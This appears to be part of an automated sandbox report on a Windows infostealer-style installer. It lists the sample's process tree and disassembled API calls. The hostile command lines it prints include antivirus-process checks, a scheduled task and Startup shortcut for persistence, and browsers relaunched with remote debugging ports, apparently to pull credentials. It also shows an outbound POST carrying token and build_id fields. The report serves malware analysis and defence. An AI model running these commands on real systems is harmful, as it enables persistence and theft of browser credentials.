2024-11-01 19:58:43 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 44 42 41 45 47 43 47 43 47 49 45 47 44 48 49 44 48 4a 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 63 34 34 65 63 66 30 62 34 37 61 30 61 66 31 38 63 39 62 38 39 35 30 34 30 31 39 37 62 39 34 0d 0a 2d 2d 2d 2d 2d 2d 44 42 41 45 47 43 47 43 47 49 45 47 44 48 49 44 48 4a 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 37 66 66 35 36 33 33 66 36 32 31 38 31 31 38 63 32 66 63 33 39 34 64 66 61 35 39 62 32 64 64 39 0d 0a 2d 2d 2d 2d 2d 2d 44 42 41 45 47 43 47 43 47 49 45 47 44 48 49 44 48 4a 4a 45 0d 0a 43 6f 6e 74 Data Ascii: ------DBAEGCGCGIEGDHIDHJJEContent-Disposition: form-data; name="token"7c44ecf0b47a0af18c9b895040197b94------DBAEGCGCGIEGDHIDHJJEContent-Disposition: form-data; name="build_id"7ff5633f6218118c2fc394dfa59b2dd9------DBAEGCGCGIEGDHIDHJJECont
2024-11-01 19:58:44 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 01 Nov 2024 19:58:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-11-01 19:58:44 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	15:51:03
Start date:	01/11/2024
Path:	C:\Users\user\Desktop\JHPvqMzKbz.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\JHPvqMzKbz.exe"
Imagebase:	0x400000
File size:	1'690'066 bytes
MD5 hash:	0F4AF03D2BA59B5C68066C95B41BFAD8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	15:51:04
Start date:	01/11/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /c copy Treat Treat.bat & Treat.bat
Imagebase:	0xca0000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	15:51:04
Start date:	01/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6b8be0000
File size:	875'008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	15:51:05
Start date:	01/11/2024
Path:	C:\Windows\SysWOW64\tasklist.exe
Wow64 process (32bit):	true
Commandline:	tasklist
Imagebase:	0x1000000
File size:	79'360 bytes
MD5 hash:	0A4448B31CE7F83CB7691A2657F330F1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	15:51:05
Start date:	01/11/2024
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr /I "wrsa opssvc"
Imagebase:	0xea0000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	15:51:06
Start date:	01/11/2024
Path:	C:\Windows\SysWOW64\tasklist.exe
Wow64 process (32bit):	true
Commandline:	tasklist
Imagebase:	0x1000000
File size:	79'360 bytes
MD5 hash:	0A4448B31CE7F83CB7691A2657F330F1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	15:51:06
Start date:	01/11/2024
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"
Imagebase:	0xea0000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	15:51:06
Start date:	01/11/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c md 646751
Imagebase:	0xca0000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	15:51:07
Start date:	01/11/2024
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr /V "AffiliateRobotsJoinedNewsletter" Purse
Imagebase:	0xea0000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	15:51:07
Start date:	01/11/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c copy /b ..\Suitable + ..\Johnson + ..\July + ..\Firmware + ..\Invalid + ..\Baby + ..\Bar + ..\Continental + ..\Ruled + ..\Gay + ..\Hop + ..\Clearance + ..\Wisdom + ..\January + ..\Denmark + ..\Bull c
Imagebase:	0xca0000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	15:51:07
Start date:	01/11/2024
Path:	C:\Users\user\AppData\Local\Temp\646751\Plates.pif
Wow64 process (32bit):	true
Commandline:	Plates.pif c
Imagebase:	0xb30000
File size:	893'608 bytes
MD5 hash:	18CE19B57F43CE0A5AF149C96AECC685
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 5%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	15:51:07
Start date:	01/11/2024
Path:	C:\Windows\SysWOW64\choice.exe
Wow64 process (32bit):	true
Commandline:	choice /d y /t 5
Imagebase:	0x150000
File size:	28'160 bytes
MD5 hash:	FCE0E41C87DC4ABBE976998AD26C27E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	15:51:08
Start date:	01/11/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c schtasks.exe /create /tn "Enjoy" /tr "wscript //B 'C:\Users\user\AppData\Local\SkySync Technologies\SkySync.js'" /sc minute /mo 5 /F
Imagebase:	0xca0000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	15:51:08
Start date:	01/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6b8be0000
File size:	875'008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	15:51:08
Start date:	01/11/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	schtasks.exe /create /tn "Enjoy" /tr "wscript //B 'C:\Users\user\AppData\Local\SkySync Technologies\SkySync.js'" /sc minute /mo 5 /F
Imagebase:	0xc90000
File size:	187'904 bytes
MD5 hash:	478BEAEC1C3A9417272BC8964ADD1CEE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	15:51:08
Start date:	01/11/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SkySync.url" & echo URL="C:\Users\user\AppData\Local\SkySync Technologies\SkySync.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SkySync.url" & exit
Imagebase:	0xca0000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	15:51:08
Start date:	01/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6b8be0000
File size:	875'008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	15:51:10
Start date:	01/11/2024
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\SkySync Technologies\SkySync.js"
Imagebase:	0x7ff7fc6d0000
File size:	170'496 bytes
MD5 hash:	0639B0A6F69B3265C1E42227D650B7D1
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	15:51:10
Start date:	01/11/2024
Path:	C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr" "C:\Users\user\AppData\Local\SkySync Technologies\e"
Imagebase:	0xa90000
File size:	893'608 bytes
MD5 hash:	18CE19B57F43CE0A5AF149C96AECC685
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 5%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	15:51:19
Start date:	01/11/2024
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\SkySync Technologies\SkySync.js"
Imagebase:	0x7ff7fc6d0000
File size:	170'496 bytes
MD5 hash:	0639B0A6F69B3265C1E42227D650B7D1
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	15:51:19
Start date:	01/11/2024
Path:	C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr" "C:\Users\user\AppData\Local\SkySync Technologies\e"
Imagebase:	0xa90000
File size:	893'608 bytes
MD5 hash:	18CE19B57F43CE0A5AF149C96AECC685
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	15:53:08
Start date:	01/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
Imagebase:	0x7ff7e8230000
File size:	2'742'376 bytes
MD5 hash:	BB7C48CDDDE076E7EB44022520F40F77
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	15:53:10
Start date:	01/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-subproc-heap-profiling --field-trial-handle=2712,i,6102219914844560487,8884076869800475828,262144 --variations-seed-version=20240909-180142.416000 --mojo-platform-channel-handle=2720 /prefetch:3
Imagebase:	0x7ff7e8230000
File size:	2'742'376 bytes
MD5 hash:	BB7C48CDDDE076E7EB44022520F40F77
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	15:53:28
Start date:	01/11/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
Imagebase:	0x7ff600d90000
File size:	3'379'080 bytes
MD5 hash:	40AAE14A5C86EA857FA6E5FED689C48E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	15:53:29
Start date:	01/11/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2592,14949538352353906560,7092886331907470317,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2888 /prefetch:3
Imagebase:	0x7ff600d90000
File size:	3'379'080 bytes
MD5 hash:	40AAE14A5C86EA857FA6E5FED689C48E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	15:53:29
Start date:	01/11/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --flag-switches-begin --flag-switches-end --do-not-de-elevate
Imagebase:	0x7ff600d90000
File size:	3'379'080 bytes
MD5 hash:	40AAE14A5C86EA857FA6E5FED689C48E
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	15:53:29
Start date:	01/11/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2052,7521359329139554661,14603226509212112048,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2400 /prefetch:3
Imagebase:	0x7ff77f110000
File size:	3'379'080 bytes
MD5 hash:	40AAE14A5C86EA857FA6E5FED689C48E
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	37
Start time:	15:53:40
Start date:	01/11/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 8460 -s 2316
Imagebase:	0xf00000
File size:	482'640 bytes
MD5 hash:	40A149513D721F096DDF50C04DA2F01F
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	38
Start time:	15:56:01
Start date:	01/11/2024
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\SkySync Technologies\SkySync.js"
Imagebase:	0x7ff7fc6d0000
File size:	170'496 bytes
MD5 hash:	0639B0A6F69B3265C1E42227D650B7D1
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: SkySync.scrPID: 2896, Parent PID: 5788

General

Target ID:	39
Start time:	15:56:01
Start date:	01/11/2024
Path:	C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr" "C:\Users\user\AppData\Local\SkySync Technologies\e"
Imagebase:	0xa90000
File size:	893'608 bytes
MD5 hash:	18CE19B57F43CE0A5AF149C96AECC685
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	40
Start time:	15:56:02
Start date:	01/11/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c schtasks.exe /create /tn "Enjoy" /tr "wscript //B 'C:\Users\user\AppData\Local\SkySync Technologies\SkySync.js'" /sc minute /mo 5 /F
Imagebase:	0xca0000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: conhost.exePID: 3660, Parent PID: 4116

General

Target ID:	41
Start time:	15:56:02
Start date:	01/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6b8be0000
File size:	875'008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	42
Start time:	15:56:02
Start date:	01/11/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	schtasks.exe /create /tn "Enjoy" /tr "wscript //B 'C:\Users\user\AppData\Local\SkySync Technologies\SkySync.js'" /sc minute /mo 5 /F
Imagebase:	0xc90000
File size:	187'904 bytes
MD5 hash:	478BEAEC1C3A9417272BC8964ADD1CEE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	44
Start time:	15:57:51
Start date:	01/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
Imagebase:	0x7ff7e8230000
File size:	2'742'376 bytes
MD5 hash:	BB7C48CDDDE076E7EB44022520F40F77
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	45
Start time:	15:57:52
Start date:	01/11/2024
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-subproc-heap-profiling --field-trial-handle=2564,i,2928389766858636215,3856255721450826831,262144 --variations-seed-version=20240909-180142.416000 --mojo-platform-channel-handle=2656 /prefetch:3
Imagebase:	0x7ff7e8230000
File size:	2'742'376 bytes
MD5 hash:	BB7C48CDDDE076E7EB44022520F40F77
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	47
Start time:	15:58:11
Start date:	01/11/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
Imagebase:	0x7ff600d90000
File size:	3'379'080 bytes
MD5 hash:	40AAE14A5C86EA857FA6E5FED689C48E
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	48
Start time:	15:58:12
Start date:	01/11/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2544,7093872642372184554,16351144755115149481,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3036 /prefetch:3
Imagebase:	0x7ff600d90000
File size:	3'379'080 bytes
MD5 hash:	40AAE14A5C86EA857FA6E5FED689C48E
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	53
Start time:	15:58:16
Start date:	01/11/2024
Path:	C:\Program Files (x86)\Microsoft\Edge\Application\94.0.992.31\identity_helper.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files (x86)\Microsoft\Edge\Application\94.0.992.31\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2544,7093872642372184554,16351144755115149481,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6932 /prefetch:8
Imagebase:	0x7ff739820000
File size:	1'113'992 bytes
MD5 hash:	688D7C201AD85A9C6EDAFDC457E53219
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	56
Start time:	15:58:43
Start date:	01/11/2024
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	875'008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	17.8%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	20.7%
Total number of Nodes:	1526
Total number of Limit Nodes:	32

Executed Functions

Function 004050CD Relevance: 68.5, APIs: 36, Strings: 3, Instructions: 295
windowclipboardmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetDlgItem.USER32(?,00000403), ref: 0040512F
GetDlgItem.USER32(?,000003EE), ref: 0040513E
GetClientRect.USER32(?,?), ref: 00405196
GetSystemMetrics.USER32(00000015), ref: 0040519E
SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004051BF
SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004051D0
SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004051E3
SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004051F1
SendMessageW.USER32(?,00001024,00000000,?), ref: 00405204
ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405226
ShowWindow.USER32(?,00000008), ref: 0040523A
GetDlgItem.USER32(?,000003EC), ref: 0040525B
SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040526B
SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405280
SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 0040528C
GetDlgItem.USER32(?,000003F8), ref: 0040514D

Part of subcall function 00403D98: SendMessageW.USER32(00000028,?,00000001,004057B4), ref: 00403DA6

Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

GetDlgItem.USER32(?,000003EC), ref: 004052AB
CreateThread.KERNELBASE(00000000,00000000,Function_00005047,00000000), ref: 004052B9
CloseHandle.KERNELBASE(00000000), ref: 004052C0
ShowWindow.USER32(00000000), ref: 004052E7
ShowWindow.USER32(?,00000008), ref: 004052EC
ShowWindow.USER32(00000008), ref: 00405333
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405365
CreatePopupMenu.USER32 ref: 00405376
AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 0040538B
GetWindowRect.USER32(?,?), ref: 0040539E
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053C0
SendMessageW.USER32(?,00001073,00000000,?), ref: 004053FB
OpenClipboard.USER32(00000000), ref: 0040540B
EmptyClipboard.USER32 ref: 00405411
GlobalAlloc.KERNEL32(00000042,00000000,?,?,00000000,?,00000000), ref: 0040541D
GlobalLock.KERNEL32(00000000), ref: 00405427
SendMessageW.USER32(?,00001073,00000000,?), ref: 0040543B
GlobalUnlock.KERNEL32(00000000), ref: 0040545D
SetClipboardData.USER32(0000000D,00000000), ref: 00405468
CloseClipboard.USER32 ref: 0040546E

Strings

New install of "%s" to "%s", xrefs: 00405182
@rD, xrefs: 004053D7
{, xrefs: 00405352

Memory Dump Source

Source File: 00000000.00000002.168239757238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.168239725080.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239788723.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239818741.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.168239919689.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_JHPvqMzKbz.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlockVersionlstrlenwvsprintf
String ID: @rD$New install of "%s" to "%s"${
API String ID: 2110491804-2409696222
Opcode ID: f168db28b2c12902a58862b60cbdcc3c6e49ead995c60d9878de2ccec3fe74d8
Instruction ID: 480b9f2609884c7685ddca5963e0cfcc77f9e358d06567921943d8ab7e89b76b
Opcode Fuzzy Hash: f168db28b2c12902a58862b60cbdcc3c6e49ead995c60d9878de2ccec3fe74d8
Instruction Fuzzy Hash: 14B15B70800608FFDB11AFA0DD85EAE7B79EF44355F00803AFA45BA1A0CBB49A519F59

Function 00403883 Relevance: 54.6, APIs: 22, Strings: 9, Instructions: 304
filestringcomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

#17.COMCTL32 ref: 004038A2
SetErrorMode.KERNELBASE(00008001), ref: 004038AD
OleInitialize.OLE32(00000000), ref: 004038B4

Part of subcall function 004062FC: GetModuleHandleA.KERNEL32(?,?,00000020,004038C6,00000008), ref: 0040630A
Part of subcall function 004062FC: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038C6,00000008), ref: 00406315
Part of subcall function 004062FC: GetProcAddress.KERNEL32(00000000), ref: 00406327

SHGetFileInfoW.SHELL32(00409264,00000000,?,000002B4,00000000), ref: 004038DC

Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016

GetCommandLineW.KERNEL32(0046ADC0,NSIS Error), ref: 004038F1
GetModuleHandleW.KERNEL32(00000000,004C30A0,00000000), ref: 00403904
CharNextW.USER32(00000000,004C30A0,00000020), ref: 0040392B
GetTempPathW.KERNEL32(00002004,004D70C8,00000000,00000020), ref: 00403A00
GetWindowsDirectoryW.KERNEL32(004D70C8,00001FFF), ref: 00403A15
lstrcatW.KERNEL32(004D70C8,\Temp), ref: 00403A21
DeleteFileW.KERNELBASE(004D30C0), ref: 00403A38
CoUninitialize.COMBASE(?), ref: 00403AD1
ExitProcess.KERNEL32 ref: 00403AF1
lstrcatW.KERNEL32(004D70C8,~nsu.tmp), ref: 00403AFD
lstrcmpiW.KERNEL32(004D70C8,004CF0B8,004D70C8,~nsu.tmp), ref: 00403B09
CreateDirectoryW.KERNEL32(004D70C8,00000000), ref: 00403B15
SetCurrentDirectoryW.KERNEL32(004D70C8), ref: 00403B1C
DeleteFileW.KERNEL32(004331E8,004331E8,?,00477008,00409204,00473000,?), ref: 00403B6D
CopyFileW.KERNEL32(004DF0D8,004331E8,00000001), ref: 00403B81
CloseHandle.KERNEL32(00000000,004331E8,004331E8,?,004331E8,00000000), ref: 00403BAE
GetCurrentProcess.KERNEL32(00000028,00000005,00000005,00000004,00000003), ref: 00403C04
ExitWindowsEx.USER32(00000002,00000000), ref: 00403C40

Strings

\Temp, xrefs: 00403A1B
NCRC, xrefs: 0040397C
~nsu.tmp, xrefs: 00403AF7
Error launching installer, xrefs: 00403A7D
1C, xrefs: 00403B56
SeShutdownPrivilege, xrefs: 00403C16
/D=, xrefs: 004039A6
NSIS Error, xrefs: 004038E2
_?=, xrefs: 00403A64

Memory Dump Source

Source File: 00000000.00000002.168239757238.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.168239725080.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
